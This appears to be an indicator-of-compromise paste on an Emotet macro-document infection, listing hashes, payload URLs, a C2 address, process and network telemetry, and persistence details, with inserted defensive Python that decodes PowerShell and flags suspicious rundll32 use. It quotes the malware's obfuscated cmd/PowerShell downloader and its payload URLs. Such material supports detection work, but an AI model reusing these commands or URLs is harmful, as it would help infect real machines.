VRad

#emotet_200121

Jan 21st, 2021 (edited)
#IOC #OptiData #VR #emotet #Epoch2 #packed #WMI #macro

https://pastebin.com/NFRmXi7k

previous_contact:
https://pastebin.com/cNb8XhX1
https://pastebin.com/1XfkVE5e
https://pastebin.com/F520pqQW

FAQ:
https://pastebin.com/AwMK1pSh

attack_vector
--------------
email attachment .zip (password-protected) > .doc > macro > WMI > cmd > powershell > rundll32 > dll

email_headers
--------------
n/a

files
--------------
SHA-256 3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638
File name Inv_9909.zip [Zip archive data, at least v5.1 to extract]
File size 85.41 KB (87458 bytes)

SHA-256 1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9
File name Inv_9909.doc [MS Word Document]
File size 168.00 KB (172032 bytes)

SHA-256 01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
File name G14C.dll [PE32 executable (DLL) (GUI) Intel 80386, for MS Windows]
File size 342.34 KB (350552 bytes)

activity
**************
PL_SCR
404 - http://trainwithconviction.com/wp-admin/y/!
404 - http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!
404 - https://perrasmoore.ca/wp-admin/rM6HK/!
200 - https://canadabrightway.com/wp-admin/n3/!
200 - https://upinsmokebatonrouge.com/var/Ux1V/!
404 - https://thelambertagency.com/staging/Vo/!
404 - https://stormhansen.com/2556460492/if/

C2 12.175.220.98

netwrk
--------------
184.168.131.241 trainwithconviction.com GET /wp-admin/y/ HTTP/1.1
34.107.103.177 convictionfitness.ca Client Hello
23.235.208.88 trainwithconviction.webdmcsolutions.com GET /wp-admin/rEEEU/ HTTP/1.1
208.113.160.43 perrasmoore.ca Client Hello
107.180.50.167 canadabrightway.com Client Hello

12.175.220.98 12.175.220.98 POST /gxgsw/zp6s9okv78r1wfc1qx5/fnzydkyg98o1/901fuwsycvt4syqm/ HTTP/1.1 Mozilla/4.0

comp
--------------
powershell.exe 3704 TCP 34.107.103.177 443 ESTABLISHED
powershell.exe 3704 TCP 23.235.208.88 80 ESTABLISHED

powershell.exe 3704 TCP 208.113.160.43 443 ESTABLISHED
powershell.exe 3704 TCP 107.180.50.167 443 ESTABLISHED

rundll32.exe 3908 TCP 12.175.220.98 80 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

{another context}

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en
C:\Windows\system32\msg.exe operator /v Word experienced an error trying to open the file.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -enc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7. . .
C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll",#1
C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",mXAAXLTXI
C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",#1
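
The cmd.exe and powershell.exe lines above are the first thing a responder has to read, and both are obfuscated: cmd.exe caret escapes ("m^s^g", "p^owe^rs^he^ll^") and a base64/UTF-16LE -enc argument. The following Python is an added example, not part of this paste and not the author's tooling: it strips the carets the way cmd.exe does and decodes the -enc value, using the command line and the truncated -enc value from the proc section as constructed sample input (the decoded prefix matches the "#2" stage listed under VR below). Function and constant names are mine.

```python
import base64
import re

# Constructed sample input, copied from the proc/VR entries of this paste: the
# caret-obfuscated cmd.exe line and the truncated -enc argument (as captured).
CMD_LINE = (
    r"C:\Windows\system32\cmd.exe /c m^s^g %username% /v Wo^rd exp^erien^ced "
    r"an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en"
)
ENC_ARG = "IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7. . ."

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc,
# ...) plus the -ec alias; match them all, longest first, followed by base64.
_ENC_NAMES = ["encodedcommand"[:n] for n in range(14, 0, -1)] + ["ec"]
ENC_FLAG = re.compile(r"-(?:" + "|".join(_ENC_NAMES) + r")\s+([A-Za-z0-9+/=]+)", re.I)


def strip_carets(cmd: str) -> str:
    """Undo cmd.exe caret escaping: '^x' is emitted as 'x' (so '^^' gives '^').

    cmd.exe drops the caret and keeps the next character literally, which is
    why 'm^s^g' runs msg.exe and 'p^owe^rs^he^ll^ -w' runs 'powershell -w'.
    A caret at the very end is kept, since cmd would treat it as a line
    continuation rather than an escape.
    """
    out = []
    i = 0
    while i < len(cmd):
        if cmd[i] == "^" and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 2
        else:
            out.append(cmd[i])
            i += 1
    return "".join(out)


def decode_enc(arg: str) -> str:
    """Decode a PowerShell -EncodedCommand value (base64 over UTF-16LE).

    Telemetry often truncates long values (this paste ends it with '. . .'),
    so non-base64 characters are dropped, an incomplete trailing sextet is
    discarded, padding is restored and a dangling odd byte is cut instead of
    raising a decode error.
    """
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", arg)   # drops padding, spaces, the '...'
    if len(b64) % 4 == 1:                       # a lone sextet carries no full byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - (len(raw) % 2)]      # UTF-16 needs an even byte count
    return raw.decode("utf-16-le")


def powershell_encoded_commands(cmd: str) -> list[str]:
    """Decode every -EncodedCommand payload in a (possibly caret-obfuscated) line."""
    cleaned = strip_carets(cmd)
    return [decode_enc(m.group(1)) for m in ENC_FLAG.finditer(cleaned)]


if __name__ == "__main__":
    print(strip_carets(CMD_LINE))
    print(repr(decode_enc(ENC_ARG)))
```

The decoded prefix is only the first stage; the "{4}{2}{0}{3}{5}{1}" -f format-string trick in stage #2 still has to be resolved by hand or in a sandbox before the URL list in stage #3 is visible.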

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21.01.2021 10:46
iwwvfo.mzw c:\users\operator\appdata\local\lmmauwa\iwwvfo.mzw 20.01.2021 23:14
C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",ZwYQYDDIS

drop
--------------
C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll
C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw
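
The traits this sample leaves in process and Run-key telemetry are all on the rundll32 lines: a module loaded from the user profile, a module renamed away from .dll (.mzw), and for the first stage an export called by ordinal (#1). The following Python is an added example, not part of this paste: it parses rundll32 command lines and reports those traits, run over the proc/persist lines above plus constructed benign lines (the shell32 Control Panel call, a quoted Program Files path and a OneDrive autorun entry are hypothetical contrast cases). Function and variable names are assumptions.

```python
import ntpath
import re

# Constructed sample input: the rundll32 lines from the proc section of this
# paste plus two benign lines (shell32 applet, quoted Program Files path).
SAMPLES = [
    r"C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString",
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll",#1',
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",mXAAXLTXI',
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",#1',
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r'"C:\Windows\System32\rundll32.exe" "C:\Program Files\Foo\helper.dll",Run',
]

# Constructed HKCU\...\Run values: the one from the persist section and a
# hypothetical benign OneDrive entry.
RUN_KEY_VALUES = {
    "iwwvfo.mzw": r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",ZwYQYDDIS',
    "OneDrive": r'"C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

# Module locations that legitimate rundll32 use loads from; anything else is
# user-writable and worth a look.
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

_RUNDLL32 = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+'   # the host, bare or quoted
    r'(?:"([^"]+)"|([^,\s]+))'                        # module path, quoted or bare
    r'\s*(?:,\s*(\S+))?',                             # optional ,EntryPoint
    re.I,
)


def parse_rundll32(cmdline: str):
    """Split a rundll32 command line into (module_path, entry_point).

    Returns None when the line is not a rundll32 invocation; entry_point is
    None when no export was named.
    """
    m = _RUNDLL32.match(cmdline)
    if not m:
        return None
    return (m.group(1) or m.group(2), m.group(3))


def triage_rundll32(cmdline: str) -> list[str]:
    """Reasons a rundll32 command line deserves a closer look (empty = none).

    The heuristics follow what this sample left behind: a module loaded from
    the user profile, a module without a .dll extension (.mzw), and an export
    called by ordinal (#1). shell32.dll,Control_RunDLL style usage yields [].
    """
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, entry = parsed
    low = module.lower()
    reasons = []
    if not low.startswith(SYSTEM_PREFIXES):
        reasons.append("module outside Windows/Program Files: " + module)
    if ntpath.splitext(low)[1] != ".dll":
        reasons.append("module extension is not .dll: " + ntpath.basename(module))
    if entry is not None and entry.startswith("#"):
        reasons.append("export called by ordinal: " + entry)
    return reasons


def flagged_run_values(values: dict) -> dict:
    """Apply the same triage to autorun values (value name -> command line)."""
    return {name: r for name, cmd in values.items() if (r := triage_rundll32(cmd))}


if __name__ == "__main__":
    for line in SAMPLES:
        print(line)
        for reason in triage_rundll32(line) or ["(nothing unusual)"]:
            print("   ", reason)
    print(flagged_run_values(RUN_KEY_VALUES))
```

The extension check is deliberately strict: the persisted copy keeps a random name and extension, so matching on ".dll" in the command line would miss it, while rundll32 itself does not care what the file is called.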

# # #
https://www.virustotal.com/gui/file/3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638/details
https://www.virustotal.com/gui/file/1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9/details
https://www.virustotal.com/gui/file/01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98/details
https://analyze.intezer.com/analyses/0817e716-a1c5-4208-a9e5-a1f7006ecb25

VR

macros>WMI>powershell
#1
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAA...

#2
sEt ydTUW ( [tYpe]("{4}{2}{0}{3}{5}{1}" -f 'Em','TORy','T','.Io.','SyS','direC')) ; set ("u"+"aX"+"KHR") ( [TYPe]("{5}{0}{1}{4}{2}{3}{6}"-f'iNt','mAn','g','E','a','SySTEM.nET.sErvicepO',...

#3
... -rePlAcE [cHAR]108[cHAR]66[cHAR]109,[cHAR]92$Htnfv2u.d ll;$Y74L=N53Q;$S8e6u_5=h tt p;$U7_xeo1=sg yw http://trainwithconviction.com/wp-admin/y/!sg yw http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!sg ...